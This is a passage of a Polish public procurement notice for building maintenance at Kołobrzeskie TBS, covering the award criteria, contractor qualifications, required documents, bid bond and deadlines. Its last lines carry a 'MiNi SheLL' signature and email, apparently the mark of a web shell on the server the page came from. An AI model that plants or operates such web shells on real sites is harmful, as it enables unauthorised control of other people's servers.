class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót, zgodnych z przedmiotem zamówienia podstawowego, do 30 % wartości szacunkowej zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował poniżej podanymi<br/>kryteriami:<br/><br/>1) Cena - stawka roboczostawka roboczogodziny brutto ( SR ) 80%<br/><br/>2) Czas reakcji - (CZR) 20 %<br/><br/>Punktacja :<br/><br/>1) Cena-Stawka roboczogodziny brutto 80 pkt<br/>2) Czas reakcji 20 pkt.<br/><br/><br/>2. Wzory obliczenia punktacji<br/><br/>1) Stawka roboczogodziny brutto SR:<br/>Sposób obliczenia przez Zamawiającego kryterium ceny :<br/> Najniższa SR z ofert<br/>Ilość punktów za stawkę roboczogodziny brutto (SR)= ----------------------------x 80 pkt<br/> SR z oferty badanej <br/><br/>2) Czas reakcji CZR:<br/><br/>Czas reakcji –rozumie się czas w minutach od chwili podjęcia informacji przez wykonawcę o awarii-zdarzeniu nagłym, nieprzewidzianym, losowym, niezależnym od wykonawcy i zamawiającego do chwili bezpośredniego przystąpienia w miejscu zdarzenia przez wykonawcę do likwidacji skutków zdarzenia. Przez zdarzenie nieprzewidziane zamawiający rozumie np. awarię zamka, wybitą szybę, zalanie itp. W związku z tym kryterium wykonawcy mogą zaoferować czas reakcji określony w minutach. Zamawiający ustala maksymalny czas na reakcję 60 minut, w związku z czym zaoferowanie czasu reakcji dłuższego niż 60 minut skutkować będzie odrzuceniem oferty. <br/>Czas reakcji:<br/>do 30 minut - 20 pkt<br/>powyżej 30 minut do 40 minut -10 pkt<br/>powyżej 40 minut - 0 pkt <br/><br/>3) Ocena oferty OF:<br/><br/>OF = SR + CZR <br/><br/>Objaśnienia:<br/>OF -ocena oferty<br/>SR –Stawka roboczogodziny<br/>CZR –Czas reakcji<br/><br/>3. Ilość punktów stanowi podstawę wyboru najkorzystniejszej oferty wygrywa ta, która uzyska największą ilość punktów. Ocenie punktowej zostają poddane tylko oferty tych wykonawców, którzy spełniają warunki udziału w postępowaniu, jak i te oferty, które odpowiadają wszystkim wymaganiom określonym w SWZ i Prawie zamówień publicznych. Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać Wykonawca, który spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej tj. wykaże, że<br/>1) wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w tym okresie, roboty konserwacyjne w branży na którą składa ofertę, zgodnie z opisem przedmiotu zamówienia dla tej branży, w ilości przepracowanych roboczogodzin, przy czym minimalna ilość roboczogodzin dla części, na którą składa ofertę musi wynosić :<br/><br/>CZĘŚĆ 1 - roboty konserwacyjne w branży ogólnobudowlanej 4000 roboczogodzin<br/>CZĘŚĆ 2 - roboty konserwacyjne w branży elektrycznej 1000 roboczogodzin<br/>CZĘŚĆ 3 - roboty konserwacyjne w branży sanitarnej 2500 roboczogodzin<br/><br/>z załączeniem dowodów określających czy te roboty zostały wykonane lub są wykonywane <br/>należycie przy czym dowodami , o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów, inne dokumenty.<br/>2) b) dysponuje osobami dla części na którą składa ofertę co najmniej:<br/><br/>CZĘŚĆ - 1 roboty konserwacyjne w branży ogólnobudowlanej co najmniej jedna osoba<br/>posiadającego uprawnienia kwalifikacyjne do wykonywania prac na wysokościach<br/>CZĘŚĆ 2 - roboty konserwacyjne w branży elektrycznej co najmniej jedna osoba posiadająca<br/>uprawnienia kwalifikacyjne co najmniej do 1 KV E i D (eksploatacyjno pomiarowe i dozorowe)<br/>CZĘŚĆ 3 - roboty konserwacyjne w branży sanitarnej co najmniej 1osoba posiadająca uprawnienia kwalifikacyjne do wykonywania robót instalacyjnych w branży sanitarnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty zasoby (wg wzoru stanowiącego załącznik nr 5 do SWZ);<br/>	9) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg wzoru stanowiącego załącznik nr 6 do SWZ);<br/>2. Na podstawie art. 128 ust. 1 ustawy Pzp, jeżeli wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub będą one niekompletne lub będą zawierać błędy, zamawiający wezwie wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie z zastrzeżeniem art. 128 ust. 1 pkt 1 i 2 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokumenty wymagane przez zamawiającego, które należy złożyć składając ofertę:<br/>	1) formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>	2) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub podmiotu udostępniającego zasoby) jest umocowana do jego reprezentowania; wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w załączniku nr 1 do SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów.<br/>	3) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu (odpowiednio: wykonawcy, podmiotu udostępniającego zasoby wykonawców wspólnie ubiegających się o udzielenie zamówienia) działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w pkt 1 ppkt 2)<br/>	4) oświadczenie o niepodleganiu wykluczeniu, według wzoru stanowiącego załącznik nr 2 do SWZ;<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z wykonawców.<br/>	5) oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 3 do SWZ;<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z wykonawców, w zakresie, w jakim wykazuje spełnianie warunków udziału w postępowaniu.<br/>	6) oświadczenie wykonawcy o poleganiu na zdolnościach lub sytuacji podmiotów udostępniających zasoby, według wzoru stanowiącego załącznik nr 4 do SWZ;<br/>Uwaga!!! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby.<br/>	7) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia wraz z oświadczeniem podmiotu udostępniającego zasoby, potwierdzającym brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (wg wzoru stanowiącego załącznik nr 4 do SWZ); zobowiązanie podmiotu udostępniającego zasoby może być zastąpione innym podmiotowym środkiem dowodowym potwierdzającym, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu;<br/>Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> NIE <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> NIE <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> WYMAGANIA DOTYCZĄCE WADIUM<br/><br/>1. Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego jest zobowiązany przed upływem terminu składania ofert wnieść wadium w wysokości:<br/><br/>CZĘŚĆ 1 - roboty konserwacyjne w branży ogólnobudowlanej 10.000,00 zł<br/>CZĘŚĆ 2 - roboty konserwacyjne w branży elektrycznej 5.000,00 zł<br/>CZĘŚĆ 3 - roboty konserwacyjne w branży sanitarnej 7.000,00 zł<br/><br/>2. Ustala się termin wniesienia wadium lub wpłynięcia na konto Kołobrzeskiego TBS Sp. z o.o. do dnia 12.08.2021 roku do godziny 10:00.<br/>3. Wadium może być wniesione:<br/>1) w pieniądzu przelewem na konto Kołobrzeskiego Towarzystwa Budownictwa Społecznego<br/>Sp. z o.o. - Bank PeKaO S.A. I O/ Kołobrzeg - nr konta: 18 1240 6508 1111 0000 5404 7408 z dopiskiem „Wadium: DOZ/02/2021/KONSERWACJA BUDYNKI GMK I KTBS”.<br/>2) w gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4. Wadium przekazane w formie polecenia przelewu uważa się za zapłacone wtedy, gdy wpłynie na rachunek Zamawiającego w terminie do dnia 30.07.2021 roku, do godziny 10:00.<br/>5. W przypadku złożenia oferty wspólnej wadium w formie innej niż gotówka musi być wystawione na wszystkich partnerów.<br/>6. Wadium wniesione w gwarancjach bankowych, gwarancjach ubezpieczeniowych, oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, które zostały określone w art. 98 ust. 6 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z treścią rozdziału IX SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana treści umowy może nastąpić w przypadkach określonych we wzorze umowy załączonym do niniejszej SWZ oraz wypadkach wskazanych w ustawie Pzp.Zamawiający dopuszcza możliwości zmian w umowie na podstawie art. 455 ust. 1, ust. 2 , ust. 3, ust. 4, nie naruszając art. 454 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-14</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com